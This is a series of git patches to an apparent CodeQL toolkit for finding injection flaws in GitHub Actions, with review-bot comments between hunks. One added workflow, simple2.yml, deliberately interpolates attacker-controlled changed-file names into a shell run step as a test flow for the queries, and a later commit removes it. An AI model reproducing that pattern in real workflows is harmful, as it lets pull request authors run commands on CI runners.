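Review bot: The two added `pack download` calls in `installPack` name `githubsecuritylab/actions-all` and `githubsecuritylab/actions-queries` without a version, so every run takes whatever the registry currently serves for those names. `codeql pack download` accepts `scope/name@version`, e.g. `["pack", "download", "githubsecuritylab/actions-all@<PINNED_VERSION>"]` (placeholder version), which ties the analysis to a release that has been reviewed. It is also not clear from the hunk why the packs are fetched from the registry and then installed again from the cloned sources in `ql/lib` and `ql/src`; a one-line comment saying which copy the analysis is meant to use would help. The `catch` that follows is only partly visible here.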
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 16 Feb 2024 14:47:34 +0100 Subject: [PATCH 0051/1267] fix(actions): ql pack installation --- .github/action/dist/index.js | 2 -- .github/action/src/codeql.ts | 10 --------- .github/workflows/simple2.yml | 42 +++++++++++++++++++++++++++++++++++ 3 files changed, 42 insertions(+), 12 deletions(-) create mode 100644 .github/workflows/simple2.yml diff --git a/.github/action/dist/index.js b/.github/action/dist/index.js index a778f7d0620..c482d87b4f2 100644 --- a/.github/action/dist/index.js +++ b/.github/action/dist/index.js @@ -28677,9 +28677,7 @@ async function downloadPack(codeql) { exports.downloadPack = downloadPack; async function installPack(codeql, dir) { try { - await runCommand(codeql, ["pack", "download", "githubsecuritylab/actions-all"], path.join(dir, "/ql/lib")); await runCommand(codeql, ["pack", "install"], path.join(dir, "/ql/lib")); - await runCommand(codeql, ["pack", "download", "githubsecuritylab/actions-queries"], path.join(dir, "/ql/src")); await runCommand(codeql, ["pack", "install"], path.join(dir, "/ql/src")); return true; } diff --git a/.github/action/src/codeql.ts b/.github/action/src/codeql.ts index 790eff6eadc..7cb1dab48e5 100644 --- a/.github/action/src/codeql.ts +++ b/.github/action/src/codeql.ts @@ -111,17 +111,7 @@ export async function installPack( dir: string, ): Promise { try { - await runCommand( - codeql, - ["pack", "download", "githubsecuritylab/actions-all"], - path.join(dir, "/ql/lib"), - ); await runCommand(codeql, ["pack", "install"], path.join(dir, "/ql/lib")); - await runCommand( - codeql, - ["pack", "download", "githubsecuritylab/actions-queries"], - path.join(dir, "/ql/src"), - ); await runCommand(codeql, ["pack", "install"], path.join(dir, "/ql/src")); return true; } catch (error) { diff --git a/.github/workflows/simple2.yml b/.github/workflows/simple2.yml new file mode 100644 index 00000000000..b40f5eb6ac0 --- /dev/null +++ b/.github/workflows/simple2.yml 
@@ -0,0 +1,42 @@ +name: CI + +on: + pull_request: + branches: + - main + +jobs: + changed_files: + runs-on: ubuntu-latest + name: Test changed-files + steps: + - uses: actions/checkout@v4 + with: + fetch-depth: 0 + + - name: Get changed files + id: source + uses: tj-actions/changed-files@v40 + + - name: Remove foo from changed files + id: step + uses: mad9000/actions-find-and-replace-string@3 + with: + source: ${{ steps.source.outputs.all_changed_files }} + find: 'foo' + replace: '' + + - name: List all changed files + id: sink + run: | + for file in ${{ steps.step.outputs.value }}; do + echo "$file was changed" + done + + - name: List all changed files + id: no-flow + run: | + for file in ${{ steps.source.outputs.all_changed_files_count }}; do + echo "$file was changed" + done + From 76f245b337149f09bbc1bbacad7f7cd23010452b Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 16 Feb 2024 15:34:20 +0100 Subject: [PATCH 0052/1267] feat(actions): use published actions packs --- .github/action/dist/index.js | 119 +++-------------------------- .github/action/src/codeql.ts | 14 ---- .github/action/src/gh.ts | 59 -------------- .github/action/src/index.ts | 35 +++------ .github/workflows/build.yml | 4 +- ql/lib/codeql/actions/DataFlow.qll | 9 ++- 6 files changed, 26 insertions(+), 214 deletions(-) delete mode 100644 .github/action/src/gh.ts diff --git a/.github/action/dist/index.js b/.github/action/dist/index.js index c482d87b4f2..501ce250969 100644 --- a/.github/action/dist/index.js +++ b/.github/action/dist/index.js 
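Review bot: The `sink` step pastes `${{ steps.step.outputs.value }}` directly into the `run` script, and because the file lives in `.github/workflows/` it is a live workflow on `pull_request`, not only input for the queries. Changed-file names are chosen by the pull request author, so that text becomes part of the shell script the runner executes. If this is purely a fixture for the `source`/`step`/`sink` flow, it belongs in a test directory outside `.github/workflows/`. If it has to run, hand the value over with `env: { FILES: "${{ steps.step.outputs.value }}" }` and loop with `for file in $FILES; do`. The two third-party actions are also referenced by mutable tags (`@v40`, `@3`) rather than full commit SHAs.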
@@ -28596,7 +28596,7 @@ var __importStar = (this && this.__importStar) || function (mod) { return result; }; Object.defineProperty(exports, "__esModule", ({ value: true })); -exports.codeqlDatabaseAnalyze = exports.codeqlDatabaseCreate = exports.installPack = exports.downloadPack = exports.runCommandJson = exports.runCommand = exports.newCodeQL = void 0; +exports.codeqlDatabaseAnalyze = exports.codeqlDatabaseCreate = exports.downloadPack = exports.runCommandJson = exports.runCommand = exports.newCodeQL = void 0; const fs = __importStar(__nccwpck_require__(7147)); const path = __importStar(__nccwpck_require__(1017)); const core = __importStar(__nccwpck_require__(2186)); @@ -28675,18 +28675,6 @@ async function downloadPack(codeql) { return false; } exports.downloadPack = downloadPack; -async function installPack(codeql, dir) { - try { - await runCommand(codeql, ["pack", "install"], path.join(dir, "/ql/lib")); - await runCommand(codeql, ["pack", "install"], path.join(dir, "/ql/src")); - return true; - } - catch (error) { - core.warning("Failed to install local packs ..."); - } - return false; -} -exports.installPack = installPack; async function codeqlDatabaseCreate(codeql) { // get runner temp directory for database var temp = process.env["RUNNER_TEMP"]; 
@@ -28734,84 +28722,6 @@ async function codeqlDatabaseAnalyze(codeql, database_path) { exports.codeqlDatabaseAnalyze = codeqlDatabaseAnalyze; -/***/ }), - -/***/ 1772: -/***/ (function(__unused_webpack_module, exports, __nccwpck_require__) { - -"use strict"; - -var __createBinding = (this && this.__createBinding) || (Object.create ? (function(o, m, k, k2) { - if (k2 === undefined) k2 = k; - var desc = Object.getOwnPropertyDescriptor(m, k); - if (!desc || ("get" in desc ? !m.__esModule : desc.writable || desc.configurable)) { - desc = { enumerable: true, get: function() { return m[k]; } }; - } - Object.defineProperty(o, k2, desc); -}) : (function(o, m, k, k2) { - if (k2 === undefined) k2 = k; - o[k2] = m[k]; -})); -var __setModuleDefault = (this && this.__setModuleDefault) || (Object.create ? (function(o, v) { - Object.defineProperty(o, "default", { enumerable: true, value: v }); -}) : function(o, v) { - o["default"] = v; -}); -var __importStar = (this && this.__importStar) || function (mod) { - if (mod && mod.__esModule) return mod; - var result = {}; - if (mod != null) for (var k in mod) if (k !== "default" && Object.prototype.hasOwnProperty.call(mod, k)) __createBinding(result, mod, k); - __setModuleDefault(result, mod); - return result; -}; -Object.defineProperty(exports, "__esModule", ({ value: true })); -exports.clonePackRepo = exports.runCommandJson = exports.runCommand = exports.newGHConfig = void 0; -const path = __importStar(__nccwpck_require__(1017)); -const core = __importStar(__nccwpck_require__(2186)); -const toolrunner = __importStar(__nccwpck_require__(8159)); -async function newGHConfig() { - return { - path: "/usr/bin/", - }; -} -exports.newGHConfig = newGHConfig; -async function runCommand(config, args) { - var bin = path.join(config.path, "gh"); - let output = ""; - var options = { - listeners: { - stdout: (data) => { - output += data.toString(); - }, - }, - }; - await new toolrunner.ToolRunner(bin, args, options).exec(); - core.debug(`Finished 
running command :: ${bin} ${args.join(" ")}`); - return output.trim(); -} -exports.runCommand = runCommand; -async function runCommandJson(config, args) { - return JSON.parse(await runCommand(config, args)); -} -exports.runCommandJson = runCommandJson; -async function clonePackRepo(gh, path) { - try { - await runCommand(gh, [ - "repo", - "clone", - "GitHubSecurityLab/codeql-actions", - path, - ]); - return true; - } - catch (error) { - core.warning("Failed to clone pack from GitHub..."); - } - return false; -} -exports.clonePackRepo = clonePackRepo; - - /***/ }), /***/ 6144: @@ -28847,17 +28757,12 @@ exports.run = void 0; const path = __importStar(__nccwpck_require__(1017)); const core = __importStar(__nccwpck_require__(2186)); const cql = __importStar(__nccwpck_require__(950)); -const gh = __importStar(__nccwpck_require__(1772)); /** * The main function for the action. * @returns {Promise} Resolves when the action is complete. */ async function run() { try { - // set up gh - var ghc = await gh.newGHConfig(); - core.debug(`GH CLI found at '${ghc.path}'`); - await gh.runCommand(ghc, ["version"]); // set up codeql var codeql = await cql.newCodeQL(); core.debug(`CodeQL CLI found at '${codeql.path}'`); 
@@ -28873,21 +28778,17 @@ async function run() { core.setFailed("CodeQL Yaml extractor not installed"); throw new Error("CodeQL Yaml extractor not installed"); } - core.info(`Cloning CodeQL Actions pack into '${codeql.pack}'`); - let pack_path = "/tmp/codeql-actions"; - var pack_cloned = await gh.clonePackRepo(ghc, pack_path); - core.info(`Cloned CodeQL Actions pack into '${pack_path}'`); - if (pack_cloned === false) { - throw new Error("Could not clone the actions ql pack"); + // download pack + core.info(`Downloading CodeQL IaC pack '${codeql.pack}'`); + var pack_downloaded = await cql.downloadPack(codeql); + if (pack_downloaded === false) { + var action_path = path.resolve(path.join(__dirname, "..", "..", "..")); + codeql.pack = path.join(action_path, "ql", "src"); + core.info(`Pack defaulting back to local pack: '${codeql.pack}'`); } - core.info(`Installing CodeQL Actions packs from '${pack_path}'`); - var pack_installed = await cql.installPack(codeql, pack_path); - if (pack_installed === false) { - throw new Error("Could not install the actions ql packs"); + else { + core.info(`Pack downloaded '${codeql.pack}'`); } - core.info(`Pack path: '${pack_path}'`); - codeql.pack = path.join(pack_path, "ql", "src"); - core.info(`Codeql Queries pack path: '${codeql.pack}'`); core.info("Creating CodeQL database..."); var database_path = await cql.codeqlDatabaseCreate(codeql); core.info("Running CodeQL analysis..."); diff --git a/.github/action/src/codeql.ts b/.github/action/src/codeql.ts index 7cb1dab48e5..ad787814448 100644 --- a/.github/action/src/codeql.ts +++ b/.github/action/src/codeql.ts 
@@ -106,20 +106,6 @@ export async function downloadPack(codeql: CodeQLConfig): Promise { return false; } -export async function installPack( - codeql: CodeQLConfig, - dir: string, -): Promise { - try { - await runCommand(codeql, ["pack", "install"], path.join(dir, "/ql/lib")); - await runCommand(codeql, ["pack", "install"], path.join(dir, "/ql/src")); - return true; - } catch (error) { - core.warning("Failed to install local packs ..."); - } - return false; -} - export async function codeqlDatabaseCreate( codeql: CodeQLConfig, ): Promise { diff --git a/.github/action/src/gh.ts b/.github/action/src/gh.ts deleted file mode 100644 index 668e559e40b..00000000000 --- a/.github/action/src/gh.ts +++ /dev/null @@ -1,59 +0,0 @@ -import * as path from "path"; -import * as core from "@actions/core"; -import * as toolrunner from "@actions/exec/lib/toolrunner"; - -export interface GHConfig { - // The path to the codeql bundle. - path: string; -} - -export async function newGHConfig(): Promise { - return { - path: "/usr/bin/", - }; -} - -export async function runCommand( - config: GHConfig, - args: string[], -): Promise { - var bin = path.join(config.path, "gh"); - let output = ""; - var options = { - listeners: { - stdout: (data: Buffer) => { - output += data.toString(); - }, - }, - }; - - await new toolrunner.ToolRunner(bin, args, options).exec(); - core.debug(`Finished running command :: ${bin} ${args.join(" ")}`); - - return output.trim(); -} - -export async function runCommandJson( - config: GHConfig, - args: string[], -): Promise { - return JSON.parse(await runCommand(config, args)); -} - -export async function clonePackRepo( - gh: GHConfig, - path: string, -): Promise { - try { - await runCommand(gh, [ - "repo", - "clone", - "GitHubSecurityLab/codeql-actions", - path, - ]); - return true; - } catch (error) { - core.warning("Failed to clone pack from GitHub..."); - } - return false; -} 
diff --git a/.github/action/src/index.ts b/.github/action/src/index.ts index 717782b555c..b07bef25e84 100644 --- a/.github/action/src/index.ts +++ b/.github/action/src/index.ts @@ -1,7 +1,6 @@ import * as path from "path"; import * as core from "@actions/core"; import * as cql from "./codeql"; -import * as gh from "./gh"; /** * The main function for the action. @@ -9,13 +8,6 @@ import * as gh from "./gh"; */ export async function run(): Promise { try { - // set up gh - var ghc = await gh.newGHConfig(); - - core.debug(`GH CLI found at '${ghc.path}'`); - - await gh.runCommand(ghc, ["version"]); - // set up codeql var codeql = await cql.newCodeQL(); 
@@ -36,26 +28,19 @@ export async function run(): Promise { throw new Error("CodeQL Yaml extractor not installed"); } - core.info(`Cloning CodeQL Actions pack into '${codeql.pack}'`); - let pack_path = "/tmp/codeql-actions"; - var pack_cloned = await gh.clonePackRepo(ghc, pack_path); - core.info(`Cloned CodeQL Actions pack into '${pack_path}'`); + // download pack + core.info(`Downloading CodeQL IaC pack '${codeql.pack}'`); + var pack_downloaded = await cql.downloadPack(codeql); - if (pack_cloned === false) { - throw new Error("Could not clone the actions ql pack"); + if (pack_downloaded === false) { + var action_path = path.resolve(path.join(__dirname, "..", "..", "..")); + codeql.pack = path.join(action_path, "ql", "src"); + + core.info(`Pack defaulting back to local pack: '${codeql.pack}'`); + } else { + core.info(`Pack downloaded '${codeql.pack}'`); } - core.info(`Installing CodeQL Actions packs from '${pack_path}'`); - var pack_installed = await cql.installPack(codeql, pack_path); - - if (pack_installed === false) { - throw new Error("Could not install the actions ql packs"); - } - - core.info(`Pack path: '${pack_path}'`); - codeql.pack = path.join(pack_path, "ql", "src"); - core.info(`Codeql Queries pack path: '${codeql.pack}'`); - core.info("Creating CodeQL database..."); var database_path = await cql.codeqlDatabaseCreate(codeql); diff --git a/.github/workflows/build.yml b/.github/workflows/build.yml index 7380ae46d07..78fec3b00eb 100644 --- a/.github/workflows/build.yml +++ b/.github/workflows/build.yml @@ -15,7 +15,7 @@ jobs: runs-on: ubuntu-latest steps: - uses: actions/checkout@v4 - - uses: dorny/paths-filter@4512585405083f25c027a35db413c2b3b9006d50 + - uses: dorny/paths-filter@v3 id: changes with: filters: | @@ -26,5 +26,3 @@ jobs: - name: Run action if: steps.changes.outputs.src == 'true' uses: ./ - with: - extractor-version: latest diff --git a/ql/lib/codeql/actions/DataFlow.qll b/ql/lib/codeql/actions/DataFlow.qll index 5040865be1d..1e30061bf45 100644 
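Review bot: A failed `downloadPack` is reported only through `core.info` before `codeql.pack` is switched to the checked-out `ql/src` directory, so a run that analysed with a different query pack than the published one looks like a normal run in the log. The fallback message should be a warning, e.g. `core.warning(`Pack download failed, falling back to local pack: '${codeql.pack}'`);`. This commit also removes `installPack`, and nothing in the hunk resolves the local pack's dependencies before `codeqlDatabaseCreate`; that may be handled elsewhere, but it is worth confirming the fallback path still works. `run()` continues outside the hunk.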
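Review bot: The first `build.yml` hunk replaces a full commit SHA for `dorny/paths-filter` with the mutable tag `@v3`, so the code this job runs can change whenever that tag is moved. Keep the pin and note the release in a comment instead: `- uses: dorny/paths-filter@<full-commit-sha> # v3` (placeholder; take the SHA of the release you intend to use). The job goes on to run the local action with `uses: ./`, so whatever the filter step executes sits in the same job as the analysis.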
--- a/ql/lib/codeql/actions/DataFlow.qll +++ b/ql/lib/codeql/actions/DataFlow.qll @@ -7,12 +7,13 @@ module DataFlow { private import codeql.actions.dataflow.internal.DataFlowImplSpecific import DataFlowMake import codeql.actions.dataflow.internal.DataFlowPublic - - /** debug */ + // debug private import codeql.actions.dataflow.internal.TaintTrackingImplSpecific import codeql.dataflow.internal.DataFlowImplConsistency as DFIC + module ActionsConsistency implements DFIC::InputSig { } + module Consistency { - import DFIC::MakeConsistency - } + import DFIC::MakeConsistency + } } From 8ae1e26d5d2072f4c38ed841a6b5f174b6a54c9b Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 16 Feb 2024 15:49:29 +0100 Subject: [PATCH 0053/1267] fix(action): qls reference --- .github/action/dist/index.js | 4 ++-- .github/action/src/codeql.ts | 2 +- .github/action/src/index.ts | 2 +- 3 files changed, 4 insertions(+), 4 deletions(-) diff --git a/.github/action/dist/index.js b/.github/action/dist/index.js index 501ce250969..e931e22d3f8 100644 --- a/.github/action/dist/index.js +++ b/.github/action/dist/index.js @@ -28707,7 +28707,7 @@ async function codeqlDatabaseAnalyze(codeql, database_path) { codeql_output, ]; // remote pack or local pack - if (codeql.pack.startsWith("GitHubSecurityLab/")) { + if (codeql.pack.startsWith("githubsecuritylab/")) { var suite = codeql.pack + ":" + codeql.suite; } else { @@ -28779,7 +28779,7 @@ async function run() { throw new Error("CodeQL Yaml extractor not installed"); } // download pack - core.info(`Downloading CodeQL IaC pack '${codeql.pack}'`); + core.info(`Downloading CodeQL Actions pack '${codeql.pack}'`); var pack_downloaded = await cql.downloadPack(codeql); if (pack_downloaded === false) { var action_path = path.resolve(path.join(__dirname, "..", "..", "..")); diff --git a/.github/action/src/codeql.ts b/.github/action/src/codeql.ts index ad787814448..48750388e57 100644 --- a/.github/action/src/codeql.ts 
+++ b/.github/action/src/codeql.ts @@ -148,7 +148,7 @@ export async function codeqlDatabaseAnalyze( ]; // remote pack or local pack - if (codeql.pack.startsWith("GitHubSecurityLab/")) { + if (codeql.pack.startsWith("githubsecuritylab/")) { var suite = codeql.pack + ":" + codeql.suite; } else { // assume path diff --git a/.github/action/src/index.ts b/.github/action/src/index.ts index b07bef25e84..b1a4fc80c64 100644 --- a/.github/action/src/index.ts +++ b/.github/action/src/index.ts @@ -29,7 +29,7 @@ export async function run(): Promise { } // download pack - core.info(`Downloading CodeQL IaC pack '${codeql.pack}'`); + core.info(`Downloading CodeQL Actions pack '${codeql.pack}'`); var pack_downloaded = await cql.downloadPack(codeql); if (pack_downloaded === false) { From 43a55e80a9991a6347a26ff452893ad32f3397cd Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 16 Feb 2024 16:02:10 +0100 Subject: [PATCH 0054/1267] feat(model-generator): New qls for modelling composite actions --- action.yml | 8 ++------ ql/src/Security/CWE-020/CompositeActionSummaries.ql | 1 + ql/src/Security/CWE-020/CompositeActionsSources.ql | 1 + ql/src/codeql-suites/actions-summaries-queries.qls | 8 ++++++++ 4 files changed, 12 insertions(+), 6 deletions(-) create mode 100644 ql/src/codeql-suites/actions-summaries-queries.qls diff --git a/action.yml b/action.yml index ed6eb327a9e..61fd380c418 100644 --- a/action.yml +++ b/action.yml @@ -8,16 +8,12 @@ inputs: source-root: description: "Path of the root source code directory, relative to $GITHUB_WORKSPACE." - default: "./" + default: ${{ github.workspace }} - sarif: + sarif-output: description: "SARIF File Output" default: "codeql-actions.sarif" -# runs: -# using: "node16" -# main: ".github/action/dist/index.js" - runs: using: 'composite' steps: diff --git a/ql/src/Security/CWE-020/CompositeActionSummaries.ql b/ql/src/Security/CWE-020/CompositeActionSummaries.ql index 875492644b8..e2843326e74 100644 
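Review bot: Remote-versus-local is decided by a hard-coded, case-sensitive scope prefix in `codeql.pack.startsWith("githubsecuritylab/")`, so a pack published under any other scope, or written with different casing, silently takes the "assume path" branch and is handed to CodeQL as a directory. Testing for a local directory instead removes the dependency on the organisation name, for example `if (!fs.existsSync(codeql.pack)) {` for the remote branch; `fs` appears to be imported in this module already, judging by the compiled output. The same condition is repeated in the generated `dist/index.js`, which should be rebuilt rather than edited by hand. `codeqlDatabaseAnalyze` continues outside the hunk.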
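Review bot: In `action.yml` the `source-root` description still reads "relative to $GITHUB_WORKSPACE", while the new default `${{ github.workspace }}` is the absolute workspace path; the description should state which form is expected, e.g. `description: "Path of the root source code directory (absolute, defaults to the workspace)."`. Renaming the `sarif` input to `sarif-output` is also an interface change: callers that still pass `sarif:` would, as far as I know, only get an unexpected-input warning and then the default file name. If that rename is intended, it deserves a line in the commit message, which currently describes only the new query suite.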
--- a/ql/src/Security/CWE-020/CompositeActionSummaries.ql +++ b/ql/src/Security/CWE-020/CompositeActionSummaries.ql @@ -7,6 +7,7 @@ * @precision high * @id actions/composite-action-summaries * @tags actions + * model-generator * external/cwe/cwe-020 */ diff --git a/ql/src/Security/CWE-020/CompositeActionsSources.ql b/ql/src/Security/CWE-020/CompositeActionsSources.ql index 19c43ad3066..67adac7dd32 100644 --- a/ql/src/Security/CWE-020/CompositeActionsSources.ql +++ b/ql/src/Security/CWE-020/CompositeActionsSources.ql @@ -7,6 +7,7 @@ * @precision high * @id actions/composite-action-sources * @tags actions + * model-generator * external/cwe/cwe-020 */ diff --git a/ql/src/codeql-suites/actions-summaries-queries.qls b/ql/src/codeql-suites/actions-summaries-queries.qls new file mode 100644 index 00000000000..5526197c7db --- /dev/null +++ b/ql/src/codeql-suites/actions-summaries-queries.qls @@ -0,0 +1,8 @@ +- description: Queries to model composite actions +- queries: . + +- include: + kind: + - path-problem + tags contain: + - model-generator From 4e44444d5a40de132104f3bd45138e58f6ae0396 Mon Sep 17 00:00:00 2001 From: Jorge <46056498+jorgectf@users.noreply.github.com> Date: Fri, 16 Feb 2024 16:03:01 +0100 Subject: [PATCH 0055/1267] Add copy workflow --- .github/workflows/copy-to-bughalla.yml | 20 ++++++++++++++++++++ 1 file changed, 20 insertions(+) create mode 100644 .github/workflows/copy-to-bughalla.yml diff --git a/.github/workflows/copy-to-bughalla.yml b/.github/workflows/copy-to-bughalla.yml new file mode 100644 index 00000000000..943935caa4a --- /dev/null +++ b/.github/workflows/copy-to-bughalla.yml 
@@ -0,0 +1,20 @@ +name: Copy to Bughalla + +on: push + +permissions: + contents: read + +jobs: + copy: + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@v4 + + - run: gh auth setup-git + env: + GITHUB_TOKEN: ${{ secrets.BUGHALLA_TOKEN }} + + - run: rm -rf .github/workflows/copy-to-bughalla.yml + - run: git remote add fork https://github.com/bughalla/codeql-actions + - run: git push fork master --force From 7c3503e6c72c30057954534b5c65a8a0b3b5e4ec Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 16 Feb 2024 16:03:38 +0100 Subject: [PATCH 0056/1267] fix: remove debug leftovers --- .github/workflows/simple2.yml | 42 ----------------------------------- 1 file changed, 42 deletions(-) delete mode 100644 .github/workflows/simple2.yml diff --git a/.github/workflows/simple2.yml b/.github/workflows/simple2.yml deleted file mode 100644 index b40f5eb6ac0..00000000000 --- a/.github/workflows/simple2.yml +++ /dev/null @@ -1,42 +0,0 @@ -name: CI - -on: - pull_request: - branches: - - main - -jobs: - changed_files: - runs-on: ubuntu-latest - name: Test changed-files - steps: - - uses: actions/checkout@v4 - with: - fetch-depth: 0 - - - name: Get changed files - id: source - uses: tj-actions/changed-files@v40 - - - name: Remove foo from changed files - id: step - uses: mad9000/actions-find-and-replace-string@3 - with: - source: ${{ steps.source.outputs.all_changed_files }} - find: 'foo' - replace: '' - - - name: List all changed files - id: sink - run: | - for file in ${{ steps.step.outputs.value }}; do - echo "$file was changed" - done - - - name: List all changed files - id: no-flow - run: | - for file in ${{ steps.source.outputs.all_changed_files_count }}; do - echo "$file was changed" - done - From 5cb9c21e05ccf0dc2fd860059213820fee5d64f0 Mon Sep 17 00:00:00 2001 
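Review bot: The trigger is an unfiltered `on: push`, yet the last step always runs `git push fork master --force` with a personal token, so a push to any branch overwrites `master` on the mirror. Restrict the trigger to the branch being mirrored, e.g. `on: { push: { branches: [master] } }`. The `rm -rf .github/workflows/copy-to-bughalla.yml` step only changes the working tree; no commit follows it, so the pushed `master` still contains this workflow file. `actions/checkout@v4` is used with its default shallow clone, which a force push of `master` may not be able to satisfy.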
From: Jorge <46056498+jorgectf@users.noreply.github.com> Date: Fri, 16 Feb 2024 16:06:05 +0100 Subject: [PATCH 0057/1267] Fetch before push --- .github/workflows/copy-to-bughalla.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/copy-to-bughalla.yml b/.github/workflows/copy-to-bughalla.yml index 943935caa4a..87506a217f6 100644 --- a/.github/workflows/copy-to-bughalla.yml +++ b/.github/workflows/copy-to-bughalla.yml @@ -17,4 +17,5 @@ jobs: - run: rm -rf .github/workflows/copy-to-bughalla.yml - run: git remote add fork https://github.com/bughalla/codeql-actions + - run: git fetch fork - run: git push fork master --force From 334fda18ba16dd2fd3878d680997a709f15a29b1 Mon Sep 17 00:00:00 2001 From: jorgectf Date: Fri, 16 Feb 2024 16:39:40 +0100 Subject: [PATCH 0058/1267] Fix copy workflow --- .github/workflows/copy-to-bughalla.yml | 26 ++++++++++++++++++-------- 1 file changed, 18 insertions(+), 8 deletions(-) diff --git a/.github/workflows/copy-to-bughalla.yml b/.github/workflows/copy-to-bughalla.yml index 87506a217f6..9e0fee9a0f7 100644 --- a/.github/workflows/copy-to-bughalla.yml +++ b/.github/workflows/copy-to-bughalla.yml 
@@ -10,12 +10,22 @@ jobs: runs-on: ubuntu-latest steps: - uses: actions/checkout@v4 - - - run: gh auth setup-git - env: - GITHUB_TOKEN: ${{ secrets.BUGHALLA_TOKEN }} + with: + token: ${{ secrets.BUGHALLA_TOKEN }} + fetch-depth: 0 - - run: rm -rf .github/workflows/copy-to-bughalla.yml - - run: git remote add fork https://github.com/bughalla/codeql-actions - - run: git fetch fork - - run: git push fork master --force + - run: | + rm -rf .github/workflows/copy-to-bughalla.yml + git remote set-url --push origin git@github.com:bughalla/codeql-actions + git config user.name 'github-actions[bot]' + git config user.email 'github-actions[bot]@users.noreply.github.com' + git add -v . + git commit -m 'Actions: Add patch' + + - name: Push changes + uses: ad-m/github-push-action@35284cf030a5836cb567a7bf1b39ebafbfae5f4a + with: + repository: bughalla/codeql-actions + github_token: ${{ secrets.BUGHALLA_TOKEN }} + branch: ${{ github.ref }} + force: true \ No newline at end of file From 1d582a4c4d21e3bf272a8a547c076493821354dc Mon Sep 17 00:00:00 2001 
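Review bot: Passing `secrets.BUGHALLA_TOKEN` to `actions/checkout` leaves it in the checkout's git configuration for the rest of the job, where the following `run` step and the third-party push action can both read it. The push step already receives the token through `github_token`, so checkout can keep its default token and add `persist-credentials: false`. With the unfiltered `on: push`, `branch: ${{ github.ref }}` and `force: true`, every branch pushed here is force-pushed to the mirror; if only one branch should be copied, filter the trigger. The `git remote set-url --push origin git@github.com:bughalla/codeql-actions` line looks unused, since the push action is given `repository:` explicitly.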
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Tue, 20 Feb 2024 10:50:02 +0100 Subject: [PATCH 0059/1267] feat(model-generation): Add more model generation queries Add new queries for finding reusable workflows that behave as summaries, sources or sinks. Add new query for finding composite actions that behave as sinks. Add `github.event.inputs` context to the regular expression matching input var accesses. --- ql/lib/codeql/actions/Ast.qll | 5 +- .../CWE-020/CompositeActionSummaries.ql | 4 +- .../Security/CWE-020/CompositeActionsSinks.ql | 42 +++++++++++++++++ .../CWE-020/CompositeActionsSources.ql | 4 +- .../CWE-020/ReusableWorkflowsSinks.ql | 42 +++++++++++++++++ .../CWE-020/ReusableWorkflowsSources.ql | 46 +++++++++++++++++++ .../CWE-020/ReusableWorkflowsSummaries.ql | 37 +++++++++++++++ 7 files changed, 177 insertions(+), 3 deletions(-) create mode 100644 ql/src/Security/CWE-020/CompositeActionsSinks.ql create mode 100644 ql/src/Security/CWE-020/ReusableWorkflowsSinks.ql create mode 100644 ql/src/Security/CWE-020/ReusableWorkflowsSources.ql create mode 100644 ql/src/Security/CWE-020/ReusableWorkflowsSummaries.ql diff --git a/ql/lib/codeql/actions/Ast.qll b/ql/lib/codeql/actions/Ast.qll index b04694ed568..605f658b263 100644 --- a/ql/lib/codeql/actions/Ast.qll +++ b/ql/lib/codeql/actions/Ast.qll @@ -369,7 +369,10 @@ private string jobsCtxRegex() { private string envCtxRegex() { result = "\\benv\\.([A-Za-z0-9_-]+)\\b" } -private string inputsCtxRegex() { result = "\\binputs\\.([A-Za-z0-9_-]+)\\b" } +private string inputsCtxRegex() { + result = "\\binputs\\.([A-Za-z0-9_-]+)\\b" or + result = "\\bgithub\\.event\\.inputs\\.([A-Za-z0-9_-]+)\\b" +} /** * Holds for an expression accesing the `steps` context. diff --git a/ql/src/Security/CWE-020/CompositeActionSummaries.ql b/ql/src/Security/CWE-020/CompositeActionSummaries.ql index e2843326e74..b451d9d1bda 100644 --- a/ql/src/Security/CWE-020/CompositeActionSummaries.ql 
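Review bot: In `inputsCtxRegex`, the existing pattern `\binputs\.` already matches inside `github.event.inputs.foo`, because the `.` before `inputs` is a word boundary. If callers apply the result as a substring search, the added alternative therefore produces the same capture a second time rather than a new match; how the result is used is outside this hunk. A single pattern avoids the overlap: `result = "\\b(?:github\\.event\\.)?inputs\\.([A-Za-z0-9_-]+)\\b"`. A one-line QLDoc on the predicate naming both contexts would make the intent clear.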
+++ b/ql/src/Security/CWE-020/CompositeActionSummaries.ql @@ -31,5 +31,7 @@ module MyFlow = TaintTracking::Global; import MyFlow::PathGraph from MyFlow::PathNode source, MyFlow::PathNode sink -where MyFlow::flowPath(source, sink) +where + MyFlow::flowPath(source, sink) and + source.getNode().getLocation().getFile() = sink.getNode().getLocation().getFile() select sink.getNode(), source, sink, "Summary" diff --git a/ql/src/Security/CWE-020/CompositeActionsSinks.ql b/ql/src/Security/CWE-020/CompositeActionsSinks.ql new file mode 100644 index 00000000000..525307bcc28 --- /dev/null +++ b/ql/src/Security/CWE-020/CompositeActionsSinks.ql @@ -0,0 +1,42 @@ +/** + * @name Composite Action Sinks + * @description Actions passing input variables to expression injection sinks. + * @kind path-problem + * @problem.severity warning + * @security-severity 9.3 + * @precision high + * @id actions/composite-action-sinks + * @tags actions + * model-generator + * external/cwe/cwe-020 + */ + +import actions +import codeql.actions.TaintTracking +import codeql.actions.dataflow.FlowSources +import codeql.actions.dataflow.ExternalFlow + +private class ExpressionInjectionSink extends DataFlow::Node { + ExpressionInjectionSink() { + exists(RunExpr e | e.getScriptExpr() = this.asExpr()) or + externallyDefinedSink(this, "expression-injection") + } +} + +private module MyConfig implements DataFlow::ConfigSig { + predicate isSource(DataFlow::Node source) { + exists(CompositeActionStmt c | c.getInputsStmt().getInputExpr(_) = source.asExpr()) + } + + predicate isSink(DataFlow::Node sink) { sink instanceof ExpressionInjectionSink } +} + +module MyFlow = TaintTracking::Global; + +import MyFlow::PathGraph + +from MyFlow::PathNode source, MyFlow::PathNode sink +where + MyFlow::flowPath(source, sink) and + source.getNode().getLocation().getFile() = sink.getNode().getLocation().getFile() +select sink.getNode(), source, sink, "Sink" 
